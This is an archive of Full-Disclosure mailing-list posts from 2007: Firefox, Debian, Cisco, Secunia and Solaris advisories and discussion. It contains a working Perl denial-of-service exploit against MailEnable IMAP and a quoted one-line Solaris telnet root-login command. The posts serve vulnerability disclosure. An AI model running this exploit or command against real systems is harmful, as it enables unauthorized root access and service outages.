Re: [Full-disclosure] Firefox: serious cookie stealing / same-domain bypass vulnerability
Great i cannot wait! On 2/14/07, Daniel Veditz <[EMAIL PROTECTED]> wrote: Peter Besenbruch wrote: > Ben Bucksch wrote: >> https://bugzilla.mozilla.org/show_bug.cgi?id=370445 > > Are we going to see a version 2.0.0.2 of Firefox soon? With all the > Firefox bugs, we are about due. A 2.0.0.2 is in progress http://weblogs.mozillazine.org/qa/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- http://www.goldwatches.com/watches.asp?Brand=39 http://www.wazoozle.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Firefox: serious cookie stealing / same-domain bypass vulnerability
Peter Besenbruch wrote: > Ben Bucksch wrote: >> https://bugzilla.mozilla.org/show_bug.cgi?id=370445 > > Are we going to see a version 2.0.0.2 of Firefox soon? With all the > Firefox bugs, we are about due. A 2.0.0.2 is in progress http://weblogs.mozillazine.org/qa/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Firefox: serious cookie stealing / same-domain bypass vulnerability
Ben Bucksch wrote: > https://bugzilla.mozilla.org/show_bug.cgi?id=370445 > > ___ > Full-Disclosure - We believe in it. Hi Ben, Are we going to see a version 2.0.0.2 of Firefox soon? With all the Firefox bugs, we are about due. -- Hawaiian Astronomical Society: http://www.hawastsoc.org HAS Deepsky Atlas: http://www.hawastsoc.org/deepsky ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Firefox: serious cookie stealing / same-domain bypass vulnerability
https://bugzilla.mozilla.org/show_bug.cgi?id=370445 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Firefox: serious cookie stealing / same-domain bypass vulnerability
There is a serious vulnerability in Mozilla Firefox, tested with 2.0.0.1, but quite certainly affecting all recent versions. The problem lies in how Firefox handles writes to the 'location.hostname' DOM property. It is possible for a script to set it to values that would not otherwise be accepted as a hostname when parsing a regular URL - including a string containing \x00. Doing this prompts a peculiar behavior: internally, DOM string variables are not NUL-terminated, and as such, most of checks will consider 'evil.com\x00foo.example.com' to be a part of *.example.com domain. The DNS resolver, however, and much of the remaining browser code, operates on ASCIZ strings native to C/C++ instead, treating the aforementioned example as 'evil.com'. This makes it possible for evil.com to modify location.hostname as described above, and have the resulting HTTP request still sent to evil.com. Once the new page is loaded, the attacker will be able to set cookies for *.example.com; he'll be also able to alter document.domain accordingly, in order to bypass the same-origin policy for XMLHttpRequest and cross-frame / cross-window data access. A quick demonstration is available here: http://lcamtuf.dione.cc/ffhostname.html If you want to confirm a successful exploitation, check Tools -> Options -> Privacy -> Show Cookies... for coredump.cx after the test; for the demo to succeed, the browser needs to have Javascript enabled, and must accept session cookies. The impact is quite severe: malicious sites can manipulate authentication cookies for third-party webpages, and, by the virtue of bypassing same-origin policy, can possibly tamper with the way these sites are displayed or how they work. Regards, /mz http://lcamtuf.coredump.cx/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [SECURITY] [DSA 1260-1] New imagemagick package fix arbitrary code execution
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - -- Debian Security Advisory DSA 1260-1[EMAIL PROTECTED] http://www.debian.org/security/ Moritz Muehlenhoff February 14th, 2007 http://www.debian.org/security/faq - -- Package: imagemagick Vulnerability : buffer overflow Problem-Type : local(remote) Debian-specific: no CVE ID : CVE-2007-0770 Vladimir Nadvornik discovered that the fix for a vulnerability in the PALM decoder of Imagemagick, a collection of image manipulation programs, was ineffective. To avoid confusion a new CVE ID has been assigned; tha original issue was tracked as CVE-2006-5456. For the stable distribution (sarge) this problem has been fixed in version 6:6.0.6.2-2.9. For the upcoming stable distribution (etch) this problem has been fixed in version 7:6.2.4.5.dfsg1-0.14. For the unstable distribution (sid) this problems has been fixed in version 7:6.2.4.5.dfsg1-0.14. We recommend that you upgrade your imagemagick packages. Upgrade Instructions - wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given below: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian GNU/Linux 3.1 alias sarge - Source archives: http://security.debian.org/pool/updates/main/i/imagemagick/imagemagick_6.0.6.2-2.9.dsc Size/MD5 checksum: 881 7a9c72b09064a000b21fb7f1c188f58b http://security.debian.org/pool/updates/main/i/imagemagick/imagemagick_6.0.6.2-2.9.diff.gz Size/MD5 checksum: 142091 882c6b166d02a3afcf7b65b935053141 http://security.debian.org/pool/updates/main/i/imagemagick/imagemagick_6.0.6.2.orig.tar.gz Size/MD5 checksum: 6824001 477a361ba0154cc2423726fab4a3f57c Alpha architecture: http://security.debian.org/pool/updates/main/i/imagemagick/imagemagick_6.0.6.2-2.9_alpha.deb Size/MD5 checksum: 1473132 a64722b75a6727372eab8c5a8e9d3460 http://security.debian.org/pool/updates/main/i/imagemagick/libmagick++6_6.0.6.2-2.9_alpha.deb Size/MD5 checksum: 173936 73ad6aba77ddd80a1fa1bf9cb6838a6a http://security.debian.org/pool/updates/main/i/imagemagick/libmagick++6-dev_6.0.6.2-2.9_alpha.deb Size/MD5 checksum: 288822 6a29717cdc16bc5f7dc3527b3c04a32e http://security.debian.org/pool/updates/main/i/imagemagick/libmagick6_6.0.6.2-2.9_alpha.deb Size/MD5 checksum: 1284370 7fe43e1953d01bfd1f40e743b43828e5 http://security.debian.org/pool/updates/main/i/imagemagick/libmagick6-dev_6.0.6.2-2.9_alpha.deb Size/MD5 checksum: 2200348 183f4d885fb0f0aa298f80ae689eb068 http://security.debian.org/pool/updates/main/i/imagemagick/perlmagick_6.0.6.2-2.9_alpha.deb Size/MD5 checksum: 234798 1e536b98cce30203535a21a110effc66 AMD64 architecture: http://security.debian.org/pool/updates/main/i/imagemagick/imagemagick_6.0.6.2-2.9_amd64.deb Size/MD5 checksum: 1466442 cce61a586a2c5456e5cd9998f503dff1 http://security.debian.org/pool/updates/main/i/imagemagick/libmagick++6_6.0.6.2-2.9_amd64.deb Size/MD5 checksum: 163710 f0c6e48b31063d20aad8d6801f7b01dd http://security.debian.org/pool/updates/main/i/imagemagick/libmagick++6-dev_6.0.6.2-2.9_amd64.deb Size/MD5 checksum: 228834 c0e8f73804537f75df7260ff692e0cb6 http://security.debian.org/pool/updates/main/i/imagemagick/libmagick6_6.0.6.2-2.9_amd64.deb Size/MD5 checksum: 1195150 0162e13544100058faee672fd672bcfd http://security.debian.org/pool/updates/main/i/imagemagick/libmagick6-dev_6.0.6.2-2.9_amd64.deb Size/MD5 checksum: 1550468 07ae791a2fbccd31ea48bb425552308f http://security.debian.org/pool/updates/main/i/imagemagick/perlmagick_6.0.6.2-2.9_amd64.deb Size/MD5 checksum: 231912 ffe6aa0bc71cb5b1f367864fd94c9c0c ARM architecture: http://security.debian.org/pool/updates/main/i/imagemagick/imagemagick_6.0.6.2-2.9_arm.deb Size/MD5 checksum: 1466166 7a8b57092ad8fcb15ff9ac69e94f79a6 http://security.debian.org/pool/updates/main/i/imagemagick/libmagick++6_6.0.6.2-2.9_arm.deb Size/MD5 checksum: 149436 f60d0449d25c294c8a9e5b111ee0dd73 http://security.debian.org/pool/updates/main/i/imagemagick/libmagick++6-dev_6.0.6.2-2.9_arm.deb Size/MD5 checksum: 234946 fc0b7d343929740700a12af92014f7b7 http://security.debian.org/pool/updates/main/i/imagemagick/libmagick6_6.0.6.2-2.9_arm.deb Size/MD5 checksum: 1204686 888ae3ff5955c8d4ba9635d2b057 http://security.debian.org/pool/updates/main/i/image
[Full-disclosure] [SECURITY] [DSA 1259-1] New fetchmail packages fix information disclosure
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - -- Debian Security Advisory DSA 1259-1[EMAIL PROTECTED] http://www.debian.org/security/ Moritz Muehlenhoff February 14th, 2007 http://www.debian.org/security/faq - -- Package: fetchmail Vulnerability : programming error Problem-Type : remote Debian-specific: no CVE ID : CVE-2006-5867 Isaac Wilcox discovered that fetchmail, a popular mail retrieval and forwarding utility, insufficiently enforces encryption of connections, which might lead to information disclosure. For the stable distribution (sarge) this problem has been fixed in version 6.2.5-12sarge5. For the upcoming stable distribution (etch) this problem has been fixed in version 6.3.6~rc5-1. For the unstable distribution (sid) this problem has been fixed in version 6.3.6~rc5-1. We recommend that you upgrade your fetchmail package. Upgrade Instructions - wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given below: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian GNU/Linux 3.1 alias sarge - Source archives: http://security.debian.org/pool/updates/main/f/fetchmail/fetchmail_6.2.5-12sarge5.dsc Size/MD5 checksum: 650 6f33289df330ad5d6b73a970a131717d http://security.debian.org/pool/updates/main/f/fetchmail/fetchmail_6.2.5-12sarge5.diff.gz Size/MD5 checksum: 155433 092b1d26d52b001b85b5afb66936fe90 http://security.debian.org/pool/updates/main/f/fetchmail/fetchmail_6.2.5.orig.tar.gz Size/MD5 checksum: 1257376 9956b30139edaa4f5f77c4d0dbd80225 Architecture independent components: http://security.debian.org/pool/updates/main/f/fetchmail/fetchmail-ssl_6.2.5-12sarge5_all.deb Size/MD5 checksum:42390 da1c1f925e68bf2385b071648db81f66 http://security.debian.org/pool/updates/main/f/fetchmail/fetchmailconf_6.2.5-12sarge5_all.deb Size/MD5 checksum: 101492 2afde54d68ae7174551613028c91403d Alpha architecture: http://security.debian.org/pool/updates/main/f/fetchmail/fetchmail_6.2.5-12sarge5_alpha.deb Size/MD5 checksum: 573554 69b08d3a3471630a9a844da3cf2389c9 AMD64 architecture: http://security.debian.org/pool/updates/main/f/fetchmail/fetchmail_6.2.5-12sarge5_amd64.deb Size/MD5 checksum: 556356 2411990fef9d0a6a9ee41db1c33afad2 ARM architecture: http://security.debian.org/pool/updates/main/f/fetchmail/fetchmail_6.2.5-12sarge5_arm.deb Size/MD5 checksum: 549686 5daedcf04842d2e5b540e88f70235ff4 HP Precision architecture: http://security.debian.org/pool/updates/main/f/fetchmail/fetchmail_6.2.5-12sarge5_hppa.deb Size/MD5 checksum: 562170 b0ef556bf0a065dd545b1381394d32c3 Intel IA-32 architecture: http://security.debian.org/pool/updates/main/f/fetchmail/fetchmail_6.2.5-12sarge5_i386.deb Size/MD5 checksum: 548738 6fc67ff75514e65d15c1ccd78f471046 Intel IA-64 architecture: http://security.debian.org/pool/updates/main/f/fetchmail/fetchmail_6.2.5-12sarge5_ia64.deb Size/MD5 checksum: 597726 4d3cb4897d0c4b410962a7694c711647 Motorola 680x0 architecture: http://security.debian.org/pool/updates/main/f/fetchmail/fetchmail_6.2.5-12sarge5_m68k.deb Size/MD5 checksum: 538548 84679550a984c949b8869d4b385fa815 Big endian MIPS architecture: http://security.debian.org/pool/updates/main/f/fetchmail/fetchmail_6.2.5-12sarge5_mips.deb Size/MD5 checksum: 557342 916d92cfc83e97bccd112408b78261cb Little endian MIPS architecture: http://security.debian.org/pool/updates/main/f/fetchmail/fetchmail_6.2.5-12sarge5_mipsel.deb Size/MD5 checksum: 557230 566a25f4fa247d9d1cebc37a3daee6c7 PowerPC architecture: http://security.debian.org/pool/updates/main/f/fetchmail/fetchmail_6.2.5-12sarge5_powerpc.deb Size/MD5 checksum: 556706 0ac0f73bbe90d13bf73b054da7187da2 IBM S/390 architecture: http://security.debian.org/pool/updates/main/f/fetchmail/fetchmail_6.2.5-12sarge5_s390.deb Size/MD5 checksum: 555180 fd69f70a49c73046cd1c265e3b1fd80d Sun Sparc architecture: http://security.debian.org/pool/updates/main/f/fetchmail/fetchmail_6.2.5-12sarge5_sparc.deb Size/MD5 checksum: 549578 28ca03faddd6b6ff3958243012e681a4 These files will probably be moved into the stable distribution on its next update. - - For apt-get: deb http://security
Re: [Full-disclosure] Solaris telnet vulnberability - how many on your network?
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 On Mon, Feb 12, 2007 at 12:00:30AM -0600, Gadi Evron wrote: > Johannes Ullrich from the SANS ISC sent this to me and then I saw it on > the DSHIELD list: > > > If you run Solaris, please check if you got telnet enabled NOW. If you > can, block port 23 at your perimeter. There is a fairly trivial > Solaris telnet 0-day. > > telnet -l "-froot" [hostname] > > will give you root on many Solaris systems with default installs > We are still testing. Please use our contact form at > https://isc.sans.org/contact.html > if you have any details about the use of this exploit. > - -l -froot ? Wow. We used to have bad bug on AIX, back in 1995 or so. It was long fixed. If I recall correctly, it was also present on SunOS, or maybe Solaris 1 or 2, but I'm not sure of anything but AIX. []s - -- Rodrigo Barbosa "Quid quid Latine dictum sit, altum viditur" "Be excellent to each other ..." - Bill & Ted (Wyld Stallyns) -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.5 (GNU/Linux) iD8DBQFF02xlpdyWzQ5b5ckRAvn4AJ4/iugzlRRWBOuX+L28SYcizu/40QCgsxG9 V6Zi1d13THRoJ9Sl4lugfq8= =rB7s -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [ALERT] CLICK HERE TO PARTY [ALERT]
full disclosure, beware, im going to take this opportunity to spam you, not far from the normal posting standard of this list, so here goes. im opening an art gallery downtown san francisco and the first opening reception is this weekend. if you are in the bay area it would be cool if you came by and checked it out. 20 GOTO 10 presents "HELLO WORLD," our very first tiny little opening reception and grand opening with works from alexis mackenzie, mindy datema, aempirei and asm. saturday, february 17, 2007 7-11PM 20 GOTO 10 679 geary st. san francisco ca 94102 http://www.twentygoto10.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Solaris telnet vulnberability - how many on your network?
From: "Ham Beast" <[EMAIL PROTECTED]> seriously why the fuck is 10 email on the telnet of the solaris with worthless content by gadi enron in mine inbox? I could be wrong, but I strongly suspect the reason to be someone exploiting the grok.org.uk with the 'full-disclosure' ID and mass-mailing every mail sent to that address to those who are present in the "fd-request" ID's addressbook. My mailbox too has been bombarded with all kinds of hacker stuff, including the antics of this real funny n3tty dude. Let me know if you want to see them, I could forward 'em to you. Regards v3dt3n ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Sample Packet Captures
It might be more effective to contribute to the Wireshark Wiki: - http://wiki.wireshark.org/SampleCaptures -HD On Wednesday 14 February 2007 11:17, crazy frog crazy frog wrote: > As it is not possible for everyone to setup different networks > quickly,I am thinking to start a wiki which will contain various > packet captures .It will help people in quickly getting the required > dump for analysis/refrence purpose. I have started a wiki here:- > http://secgeeks.com/packetland > i would like to hear your feedback regarding this.feel free to upload > any packet dump you might have. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Sample Packet Captures
Hi All, As it is not possible for everyone to setup different networks quickly,I am thinking to start a wiki which will contain various packet captures .It will help people in quickly getting the required dump for analysis/refrence purpose. I have started a wiki here:- http://secgeeks.com/packetland i would like to hear your feedback regarding this.feel free to upload any packet dump you might have. Regards, _CF --- http://www.secgeeks.com get a blog on secgeeks :) register here:- http://secgeeks.com/user/register rss feeds :- http://secgeeks.com/node/feed Submit you security articles,send them to [EMAIL PROTECTED] http://www.newskicks.com Submit and kick for new stories from all around the world. --- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] MailEnable DoS POC-2
This version will work on the latest MailEnable v2.37..
Symantec seem to think this is the same issue as BID 20290, but it is
in fact, completely different... and somewhat unpatched..
---
([EMAIL PROTECTED])
#!/usr/bin/perl
#
# maildisable-v7.pl
#
# Mail Enable Professional/Enterprise v2.32-7 (win32)
# by mu-b - Wed Feb 14 2007
#
# - Tested on: Mail Enable Professional v2.37 (win32)
#
use Getopt::Std; getopts('t:', \%arg);
use Socket;
use MIME::Base64;
&print_header;
my $target;
if (defined($arg{'t'})) { $target = $arg{'t'} }
if (!(defined($target))) { &usage; }
my $imapd_port = 143;
my $send_delay = 2;
my $PAD = 'A';
if (connect_host($target, $imapd_port)) {
print("-> * Connected\n");
send(SOCKET, "1 AUTHENTICATE NTLM\r\n", 0);
sleep($send_delay);
$buf = ($PAD x 12).
"\xfa\xff\xff\xff".
($PAD x 12);
send(SOCKET, encode_base64($buf)."\r\n", 0);
sleep($send_delay);
$buf = ($PAD x 28).
"\x00\x01".
($PAD x 2).
"\xff\xff\xff\x7f";
send(SOCKET, encode_base64($buf)."\r\n", 0);
sleep($send_delay);
print("-> * Successfully sent payload!\n");
}
sub print_header {
print("MailEnable Pro v2.37 DoS POC\n");
print("by: <[EMAIL PROTECTED]>\n\n");
}
sub usage {
print(qq(Usage: $0 -t
-t : hostname to test
));
exit(1);
}
sub connect_host {
($target, $port) = @_;
$iaddr = inet_aton($target) || die("Error: $!\n");
$paddr = sockaddr_in($port, $iaddr) || die("Error: $!\n");
$proto = getprotobyname('tcp') || die("Error: $!\n");
socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n");
connect(SOCKET, $paddr) || die("Error: $!\n");
return(1338);
}
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Cisco Security Advisory: Multiple Vulnerabilities in Firewall Services Module
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Cisco Security Advisory: Multiple Vulnerabilities in Firewall Services Module Advisory ID: cisco-sa-20070214-fwsm http://www.cisco.com/warp/public/707/cisco-sa-20070214-fwsm.shtml Revision 1.0 For Public Release 2007 February 14 1600 UTC (GMT) - --- Summary === Multiple vulnerabilities exist in the Cisco Firewall Services Module (FWSM). These vulnerabilities occur in the processing of specific Hypertext Transfer Protocol (HTTP), Secure HTTP (HTTPS), Session Initiation Protocol (SIP), and Simple Network Management Protocol (SNMP) traffic. If verbose logging is enabled for debugging purposes, a vulnerability exists when the FWSM processes packets destined to itself. All of these vulnerabilities may result in a reload of the device. An additional vulnerability is included in this advisory in which the manipulation of access control lists (ACLs) that make use of object groups may corrupt the ACL and create a situation where unwanted traffic may be permitted or desirable traffic may be blocked. These vulnerabilities are independent of each other; a release that is affected by one vulnerability is not necessarily affected by the others. There are workarounds for some of the vulnerabilities disclosed in this advisory. Cisco has made free software available to address this issue for affected customers. This advisory is posted at http://www.cisco.com/warp/public/707/cisco-sa-20070214-fwsm.shtml Affected Products = The vulnerabilities described in this document apply to the FWSM. The companion advisory http://www.cisco.com/warp/public/707/cisco-sa-20070214-pix.shtml contains information about similar vulnerabilities that affect the Cisco PIX 500 Series Security Appliances and the Cisco ASA 5500 Series Adaptive Security Appliances. Vulnerable Products +-- The following table indicates which software releases for the Cisco FWSM are affected and under what conditions: +-+ | Vulnerability | Only affected | Vulnerable | Versions | Cisco Bug | | Name | if... | by | affected | ID | | || default? | || |---+++--+| | | Enhanced || || | 1. Enhanced | inspection of || All 3.x || | Inspection of | HTTP traffic || software || | Malformed | is enabled | No | releases | CSCsd75794 | | HTTP Traffic | through the|| prior to || | May Cause | command|| 3.1 || | Reload| "inspect http || (3.24) || | | " || || |---+++--+| | | SIP inspection || || | | is enabled || All || | | through the|| software || | | command "fixup || releases || | 2. Inspection | protocol sip" || prior to || | of Malformed | (in FWSM | Yes for| 2.3 || | SIP Messages | software 2.x | 2.x and no | (4.12) | CSCsg80915 | | May Cause | and before) or | for 3.x| and all || | Reload| through the|| 3.x || | | command|| releases || | | "inspect sip" || prior to || | | (in FWSM || 3.1 || | | software 3.x || (3.24) || | | and later) || || |---+++--+| | | Logging at || || | | "debugging"|| || | 3. Processing | level || All 3.x || | of Packets| (regardless of || software || | Destined to | the logging| No | releases | CSCse85707 | | the FWSM May | destination) || prior to || | Cause Reload | and syslog || 3.1(3.3) || | | message 710006 || || | | is enabled || || |---+++--+| | | Network access || |
[Full-disclosure] Cisco Security Advisory: Multiple Vulnerabilities in Cisco PIX and ASA Appliances
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Cisco Security Advisory: Multiple Vulnerabilities in Cisco PIX and ASA Appliances Advisory ID: cisco-sa-20070214-pix http://www.cisco.com/warp/public/707/cisco-sa-20070214-pix.shtml Revision 1.0 For Public Release 2007 February 14 1600 UTC (GMT) - --- Summary === Multiple vulnerabilities are found in Cisco PIX 500 Series Security Appliances and the Cisco ASA 5500 Series Adaptive Security Appliances. They affect the following: * Enhanced inspection of Malformed Hypertext Transfer Protocol (HTTP) traffic * Inspection of malformed Session Initiation Protocol (SIP) packets * Inspection of a stream of malformed Transmission Control Protocol (TCP) packets * Privilege escalation Vulnerabilities are independent of each other. If a vulnerability affects a device, it does not necessarily mean that the device is affected by all of them. This advisory is posted at http://www.cisco.com/warp/public/707/cisco-sa-20070214-pix.shtml. Affected Products = In addition to the Cisco PIX 500 Series Security Appliances and the Cisco ASA 5500 Series Adaptive Security Appliances, some vulnerabilities also affect Cisco Firewall Services Module (FWSM). More information regarding FWSM can be found in the companion advisory http://www.cisco.com/warp/public/707/cisco-sa-20070214-fwsm.shtml. Vulnerable Products +-- The following software releases for Cisco PIX and ASA Security Appliances are affected: +-+ | Vulnerability | Only affected | Vulnerable | Versions | Cisco Bug | | Name | if... | by | affected | ID | | || default? | || |---+++--+| | | Enhanced || Only 7.x || | | inspection of || software || | Enhanced | HTTP traffic || releases || | inspection of | is enabled via | No | prior to | CSCsd75794 | | Malformed | the command|| 7.0 || | HTTP traffic | "inspect http || (4.14) || | | " || and 7.1 || | ||| (2.1)|| |---+++--+| | ||| For 6.x || | ||| software || | ||| all || | ||| releases || | ||| prior to || | ||| 6.3 || | ||| (5.115), || | ||| for || | | SIP inspection | No for 7.x | 7.0.x|| | Inspection of | is enabled via | releases | software | CSCse27708 | | malformed SIP | the command| Yes for| all | and| | packets | "fixup | 6.x| releases | CSCsd97077 | | | protocol sip" | releases | prior to || | | or || 7.0 || | | "inspect sip" || (5.2), || | ||| and for || | ||| 7.1.x|| | ||| software || | ||| all || | ||| releases || | ||| prior to || | ||| 7.1(2.5) || |---+++--+| | | TCP-based || || | Inspection of | protocol || Only || | a stream of | inspection is || 7.2.2|| | malformed TCP | enabled, for | Yes| software | CSCsh12711 | | packets | example|| release || | | "inspect ftp" || || | | or || || | | "inspect http" || || |---+++--+| | | If LOCAL || Only |
[Full-disclosure] (no subject)
___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Solaris telnet vulnberability - how many onyour network?
A patch has been released. http://sunsolve.sun.com/search/document.do?assetkey=1-26-102802-1 == David Taylor //Sr. Information Security Specialist University of Pennsylvania Information Security Philadelphia PA USA (215) 898-1236 http://www.upenn.edu/computing/security/ == -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Joe Shamblin Sent: Tuesday, February 13, 2007 7:17 PM To: [EMAIL PROTECTED] Cc: Oliver Friedrichs; bugtraq@securityfocus.com; full-disclosure@lists.grok.org.uk; Gadi Evron Subject: Re: [Full-disclosure] Solaris telnet vulnberability - how many onyour network? [EMAIL PROTECTED] wrote: >> On Tue, 13 Feb 2007 [EMAIL PROTECTED] wrote: On Tue, 13 Feb 2007 [EMAIL PROTECTED] wrote: >> Am I missing something? This vulnerability is close to 10 years old. >> It was in one of the first versions of Solaris after Sun moved off of >> the SunOS BSD platform and over to SysV. It has specifically to do w= >> ith >> how arguments are processed via getopt() if I recall correctly. > You're confused with AIX/Linux > > Solaris did not have the -f option in login until much later. Hi Casper. While we have you here, any idea on when Sun will be patching this issue? >>> Now, follow the links from http://sunsolve.sun.com/tpatches >>> >>> Casper >>> >> Many thanks Casper! Can you give some more information on exactly what is >> patched. Any Sun released advisory? > > > The simplest possible fix on such short notice: > > http://cvs.opensolaris.org/source/diff/onnv/onnv-gate/usr/src/cmd/cmd-inet/u sr.sbin/in.telnetd.c?r2=3629&r1=2923 > > Casper How about just uncommenting the following from /etc/default/login # If CONSOLE is set, root can only login on that device. # Comment this line out to allow remote login by root. # CONSOLE=/dev/console Not a fix to be sure, but at least prevents a remote login. Joe -- Joe Shamblin[EMAIL PROTECTED] Senior Systems Administrator Department of Computer Science (919) 660-6582 Duke University ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Secunia Research: MailEnable Web Mail Client Multiple Vulnerabilities
== Secunia Research 14/02/2007 - MailEnable Web Mail Client Multiple Vulnerabilities - == Table of Contents Affected Software1 Severity.2 Vendor's Description of Software.3 Description of Vulnerability.4 Solution.5 Time Table...6 Credits..7 References...8 About Secunia9 Verification10 == 1) Affected Software * MailEnable Professional Edition 2.351 NOTE: Other versions may also be affected. == 2) Severity Rating: Moderately Critical Impact: Cross-site scripting Where: From Remote == 3) Vendor's Description of Software "MailEnable's mail server software provides a powerful, scalable hosted messaging platform for Microsoft Windows. MailEnable offers stability, unsurpassed flexibility and an extensive feature set which allows you to provide cost-effective mail services." Product Link: http://www.mailenable.com/default.asp == 4) Description of Vulnerability Secunia Research has discovered some vulnerabilities in MailEnable Web Mail Client, which can be exploited by malicious people to conduct cross-site scripting, cross-site request forgery, and script insertion attacks. 1) Scripts in email messages are not properly sanitised before being displayed in the email message. This can be exploited to insert arbitrary HTML and script code, which is executed in a user's browser session in context of an affected site when a user views a specially crafted email message. 2) Input passed to the "ID" parameter in mewebmail/base/default/lang/EN/right.asp, mewebmail/base/default/lang/EN/Forms/MAI/list.asp, and mewebmail/base/default/lang/EN/Forms/VCF/list.asp is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site. Successful exploitation requires that the target user is logged in. 3) The application allows users to send messages via HTTP requests without performing any validity checks to verify the request. This can be exploited to change a user's settings by e.g. tricking a target user into visiting a malicious website. == 5) Solution Update to the latest version. http://www.mailenable.com/download.asp == 6) Time Table 06/02/2007 - Vendor notified. 06/02/2007 - Vendor response. 13/02/2007 - Request for status update. 13/02/2007 - Vendor response with fix information. 14/02/2007 - Public disclosure. == 7) Credits Discovered by JJ Reyes, Secunia Research. == 8) References The Common Vulnerabilities and Exposures (CVE) project has assigned the following CVE identifiers: * CVE-2007-0651 (XSS) * CVE-2007-0652 (CSRF) == 9) About Secunia Secunia offers vulnerability management solutions to corporate customers with verified and reliable vulnerability intelligence relevant to their specific system configuration: http://corporate.secunia.com/ Secunia also provides a publicly accessible and comprehensive advisory database as a service to the security community and private individuals, who are interested in or concerned about IT-security. http://secunia.com/ Secunia believes that it is important to support the community and to do active vulnerability research in order to aid improving the security and reliability of software in general: http://corporate.secunia.com/secunia_research/33/ Secunia regularly hires new skilled team members. Check the URL below to see currently vacant positions: http://secunia.com/secunia_vacancies/ Secunia offers a FREE mailing list called Secunia Security Advisories: http://secunia.com/secunia_security_advisories/ == 10) Verification Please verify this advisory by visiting
Re: [Full-disclosure] Solaris telnet vulnberability - how many on your network?
>> The simplest possible fix on such short notice: >> >> http://cvs.opensolaris.org/source/diff/onnv/onnv-gate/usr/src/cmd/cmd-inet/usr.sbin/in.telnetd.c ?r2=3629&r1=2923 >> >> Casper > > >How about just uncommenting the following from /etc/default/login > ># If CONSOLE is set, root can only login on that device. ># Comment this line out to allow remote login by root. ># >CONSOLE=/dev/console > >Not a fix to be sure, but at least prevents a remote login. That is the default; and preventing root logins does not prevent other logins. "svcadm disable telnet" is the best fix (and there's really no reason to enable it) Casper ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Solaris telnet vulnberability - how many on your network?
If someone was going to plant a backdoor in Solaris, don't you think they would have chosen a service that most people would leave turned on? The only way I can see someone choosing telnet for a backdoor is if it happened a long time ago. So, two things I'm curious about, but too busy (lazy) at the moment to look up: 1. Didn't Sun open up the source to Solaris? I wonder if it looks more like a bug or a backdoor in the source. 2. Did this get reintroduced to Solaris, or has it been there ever since the legacy code was pulled over from SysV? --Adrian P.S. - Apologies if this was answered somewhere, and I missed it. On 2/13/07, Gadi Evron <[EMAIL PROTECTED]> wrote: On Mon, 12 Feb 2007, Oliver Friedrichs wrote: > > Am I missing something? This vulnerability is close to 10 years old. > It was in one of the first versions of Solaris after Sun moved off of > the SunOS BSD platform and over to SysV. It has specifically to do with > how arguments are processed via getopt() if I recall correctly. Hey Oliver! :) Well than, I guess it just became new again. And to be honest, I have to agree with a previous poster and suspect (only suspect) it could somehow be a backdoor rather than a bug. The reason why this vulnerability is so critical is the number of networks and organizations which rely on Solaris for critical production servers, as well as use telnet for internal communication on their LAN (now how smart is that? I'd rather use telnet on the Internet than on a local LAN). Further, there are quite a few third party appliances (some infrastructure back-end) that can not easily be patched running on Solaris (forget fuzzing or VA, people never even NMAP appliances 